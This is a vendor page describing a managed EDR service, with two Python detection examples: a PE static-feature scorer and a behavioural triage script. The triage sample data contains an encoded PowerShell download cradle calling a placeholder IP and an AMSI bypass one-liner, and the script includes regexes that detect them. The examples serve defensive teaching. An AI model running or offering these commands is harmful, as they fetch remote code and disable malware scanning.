EDR stands for Endpoint Detection & Response and describes a software-based approach to endpoint protection that today usually relies on machine learning. The aim is to protect endpoints such as notebooks, PCs and servers from malware, e.g. ransomware, spyware and viruses. To do this, the background processes and activities on the devices are monitored continuously: process and binary executions, file modifications, registry changes and network connections are recorded and evaluated, and anything that looks suspicious is flagged. If, for example, a supposedly harmless Word document opens a connection to the Internet, or even to a known command & control server of a botnet, a good EDR solution detects this, raises an alert or, depending on the configuration, blocks it directly.
However sophisticated classic, signature-based anti-malware software is today, it still only detects threats that are already known. Even next-generation anti-virus concepts, which work with differentiated score values and are better equipped for fileless attacks, are not sufficient on their own to secure endpoints in the home office. Attackers produce new malicious code almost every hour, while signature-based tools can only detect an attack once a signature for it has been written and distributed, i.e. with a delay.
Whether on site at the company or in the home office: Managed EDR detects conspicuous malicious code on your employees' work devices, even if it has not yet been officially recorded as such. Machine learning is used for this purpose: a model trained on the characteristics of known malware recognises intruders that share enough of those characteristics and quarantines them as malicious. So-called software agents detect the attackers within the Windows, Linux and macOS operating systems, and also in Virtual Desktop Infrastructures (VDI). The agents are installed locally on the end devices to be protected and retrieve their configuration, any updates and the latest version of the AI model from the cloud platform.
The model takes into account numerous static properties of a file, such as its size, particular contents (strings), icons, the imports it uses, the access permissions it requests, the packer used, the programming language, header details and compiler properties. New, unknown files are compared against this model in real time before they are executed and classified accordingly. Because these properties are read from the file without running it, an attacker can try to disguise them, for example by packing or obfuscating the binary; this is why the static classification is complemented by the behavioural monitoring described below.
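To make the static side concrete, the following added example (written for this page, not the vendor's agent or model) parses a Windows PE header with the standard library only, extracts the kind of properties listed above (machine type, linker version, ASLR/DEP flags, section names and entropies, embedded strings) and runs them through a hand-weighted score that stands in for the trained model. The two PE images are constructed in memory and are not real programs; the weights, the 7.2 entropy cut-off, the 50-point threshold and the list of suspicious API names are illustrative assumptions, not values from the product.

```python
import math
import re
import struct


# Constructed sample: a minimal, non-functional 64-bit PE image built in memory only to
# exercise the feature extractor. It is not a real program and cannot be executed.
def build_sample_pe(packed: bool) -> bytes:
    dos = bytearray(0x80)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)                 # e_lfanew: PE header at 0x80
    coff = struct.pack("<4sHHIIIHH", b"PE\0\0", 0x8664, 2, 0x5F5E1000,
                       0, 0, 240, 0x0022)                   # x86-64, 2 sections, EXECUTABLE_IMAGE
    opt = bytearray(240)                                    # PE32+ optional header
    struct.pack_into("<HBB", opt, 0, 0x20B, 14, 0)          # Magic PE32+, linker version 14.0
    dll_chars = 0x0000 if packed else 0x0140                # benign build: DYNAMIC_BASE | NX_COMPAT
    struct.pack_into("<HH", opt, 68, 2, dll_chars)          # Subsystem 2 = Windows GUI
    if packed:
        names = (b"UPX0", b"UPX1")
        sec1 = (b"kernel32.dll\0CreateRemoteThread\0VirtualAllocEx\0"
                b"WriteProcessMemory\0http://203.0.113.10/stage2.bin\0")
        sec2 = bytes((i * 103 + 17) % 256 for i in range(256))   # every byte value once: entropy 8.0
    else:
        names = (b".text", b".data")
        sec1 = b"kernel32.dll\0GetModuleHandleA\0ExitProcess\0"
        sec2 = b"Hello, world!\0"
    headers = b""
    for i, name in enumerate(names):                        # IMAGE_SECTION_HEADER, 40 bytes each
        headers += struct.pack("<8sIIIIIIHHI", name, 0x100, 0x1000 * (i + 1), 0x100,
                               0x200 + 0x100 * i, 0, 0, 0, 0, 0x60000020)
    image = (bytes(dos) + coff + bytes(opt) + headers).ljust(0x200, b"\0")
    return image + sec1.ljust(0x100, b"\0") + sec2.ljust(0x100, b"\0")


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte; packed or encrypted sections sit close to the maximum of 8.0."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    return -sum(c / len(buf) * math.log2(c / len(buf)) for c in counts if c)


def extract_features(data: bytes) -> dict:
    """Static properties of the kind a pre-execution model is fed, read without running the file."""
    pe_off = struct.unpack_from("<I", data, 0x3C)[0] if len(data) >= 0x40 and data[:2] == b"MZ" else -1
    if pe_off < 0 or data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    machine, nsect, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, pe_off + 4)
    opt_off = pe_off + 24
    magic, linker_major, linker_minor = struct.unpack_from("<HBB", data, opt_off)
    _, dll_chars = struct.unpack_from("<HH", data, opt_off + 68)
    sections = []
    for i in range(nsect):
        name, _, _, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, opt_off + opt_size + i * 40)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "entropy": round(shannon_entropy(data[raw_ptr:raw_ptr + raw_size]), 2)})
    return {
        "size": len(data),
        "machine": machine,                                 # 0x8664 = x86-64, 0x14C = x86
        "is_dll": bool(chars & 0x2000),
        "pe32plus": magic == 0x20B,
        "linker": f"{linker_major}.{linker_minor}",         # compiler/linker hint
        "aslr": bool(dll_chars & 0x0040),                   # IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE
        "nx": bool(dll_chars & 0x0100),                     # IMAGE_DLLCHARACTERISTICS_NX_COMPAT
        "sections": sections,
        "packer_hint": any(s["name"].startswith("UPX") or s["entropy"] > 7.2 for s in sections),
        "strings": [s.decode("ascii") for s in re.findall(rb"[\x20-\x7e]{5,}", data)],
    }


SUSPICIOUS_APIS = {"CreateRemoteThread", "VirtualAllocEx", "WriteProcessMemory",
                   "NtUnmapViewOfSection", "SetWindowsHookExA"}     # classic injection/hooking imports
URL_RE = re.compile(r"https?://")


def score(features: dict) -> tuple:
    """Hand-weighted stand-in for the trained model; the weights are illustrative assumptions."""
    apis = sorted(set(features["strings"]) & SUSPICIOUS_APIS)
    urls = [s for s in features["strings"] if URL_RE.match(s)]
    rules = [
        (30, "packer: UPX section names or section entropy > 7.2", features["packer_hint"]),
        (15 * len(apis), "injection APIs: " + ", ".join(apis), bool(apis)),
        (20, "embedded URL: " + ", ".join(urls), bool(urls)),
        (10, "built without ASLR/DEP", not (features["aslr"] and features["nx"])),
    ]
    hits = [(weight, why) for weight, why, hit in rules if hit]
    return sum(weight for weight, _ in hits), [why for _, why in hits]


def classify(data: bytes, threshold: int = 50) -> dict:
    """Pre-execution verdict: 'suspicious' at or above the (assumed) threshold, else 'clean'."""
    features = extract_features(data)
    points, reasons = score(features)
    verdict = "suspicious" if points >= threshold else "clean"
    return {"verdict": verdict, "score": points, "reasons": reasons, "features": features}


if __name__ == "__main__":
    for label, sample in (("packed", build_sample_pe(True)), ("benign", build_sample_pe(False))):
        result = classify(sample)
        print(f"{label}: {result['verdict']} (score {result['score']}) {result['reasons']}")
```

The packed sample scores on all four rules; the benign build, linked with ASLR and DEP and without injection imports, scores zero. A real model weighs far more features than this, but the pipeline is the same: parse without executing, vectorise, classify before the process is allowed to start.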
Our solution also detects threats that operate directly in memory, without involving files or disk accesses. For this purpose, the behaviour of processes is observed. Scripting languages such as JScript, tools such as PowerShell and macros in Office documents (VBA) are frequently used in attacks. Managed EDR identifies malicious or unauthorized behaviour by monitoring the respective script interpreter rather than a script file on disk, so that encoded or obfuscated scripts that are never written to disk are still seen. In the event of anomalies, an alert is issued immediately.
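The following added example (written for this page; it is not the vendor's detection logic) shows the kind of interpreter-level behavioural checks the paragraph describes, run over four constructed process-start records of the sort an agent reports: a PowerShell download cradle hidden behind -EncodedCommand and launched from Word, a harmless scheduled script, a JScript file executed by wscript.exe from a user-writable directory, and a well-known AMSI bypass string. The event format, the regular expressions and the severity rules are assumptions made for the example.

```python
import base64
import re
from typing import Optional

# Constructed sample telemetry (not real logs): one record per script-interpreter process
# start, with parent process, image name and full command line as an agent would report them.
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/p.ps1')".encode("utf-16le")
).decode()

SAMPLE_EVENTS = [
    {"id": 1, "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED_PAYLOAD}"},
    {"id": 2, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"id": 3, "parent": "cmd.exe", "image": "wscript.exe",
     "cmdline": r"wscript.exe //B C:\Users\Public\invoice.js"},
    {"id": 4, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -c \"[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
                ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)\""},
]

OFFICE_PARENTS = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "OUTLOOK.EXE"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
CRADLE_RE = re.compile(r"(?:\bIEX\b|Invoke-Expression).*?"
                       r"(?:DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient)", re.I | re.S)
AMSI_RE = re.compile(r"AmsiUtils|amsiInitFailed|AmsiScanBuffer", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile\b|-noni\b", re.I)
WRITABLE_DIR_RE = re.compile(r"\\(?:Users\\Public|Temp|AppData\\Local\\Temp)\\", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script hidden behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event: dict) -> dict:
    """Behavioural checks on one interpreter start; the script file itself is never needed."""
    findings = []
    script = decode_encoded_command(event["cmdline"])
    if script is not None:
        findings.append("encoded_command")
    text = event["cmdline"] + "\n" + (script or "")      # inspect the visible and the decoded script
    if CRADLE_RE.search(text):
        findings.append("download_cradle")
    if AMSI_RE.search(text):
        findings.append("amsi_bypass")
    if HIDDEN_RE.search(event["cmdline"]):
        findings.append("evasion_flags")
    if event["parent"].upper() in OFFICE_PARENTS and event["image"].lower() in SCRIPT_HOSTS:
        findings.append("office_spawned_interpreter")
    if event["image"].lower() in SCRIPT_HOSTS and WRITABLE_DIR_RE.search(event["cmdline"]):
        findings.append("script_in_user_writable_dir")
    if {"download_cradle", "amsi_bypass", "office_spawned_interpreter"} & set(findings):
        severity = "high"
    elif findings:
        severity = "medium"
    else:
        severity = "none"
    return {"id": event["id"], "severity": severity, "findings": findings, "decoded": script}


def triage(events: list) -> list:
    return [analyze(e) for e in events]


if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        print(f"event {r['id']}: {r['severity']:6} {r['findings']}")
```

Note that event 1 is caught only because the encoded command is decoded before the cradle pattern is applied; a check that looked at the raw command line alone would see nothing but base64. The office-parent rule implements the Word-document scenario from the introduction at the process level.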
Detecting threats is one thing, acting on them is another: in the event of a malware incident, Managed EDR triggers automated actions according to your requirements, such as isolating the compromised host from the network. Isolation does not simply shut the endpoint down: a secure channel between the agent and the platform is kept open so that the device can still be investigated and remediated, while all other network communication to and from the device is blocked. For any security incident, the faster it is detected and contained, the less damage it does; automated response therefore shortens the window between detection and containment considerably.
Our solution consists of lean, high-performance agents running on your endpoints and a central, multi-tenant cloud platform operated in Europe. As your IT service provider, we take over the management of endpoint detection & response completely for you in our BSI-certified Security Operations Center (SOC). Among other things, we take care of the configuration and regularly add further system groups and agent policies. You also don't need to worry about regular maintenance: your end devices remain reliably protected against both common known attacks and new types of attacks.
You also benefit from professional reporting on malware detections. Of course, you will be alerted immediately as soon as anything conspicuous happens that the system classifies as critical. The evaluation is performed by our trained security analysts, who can reliably assess whether an incident is relevant. We provide concrete recommendations on how you can further improve the security of your endpoints.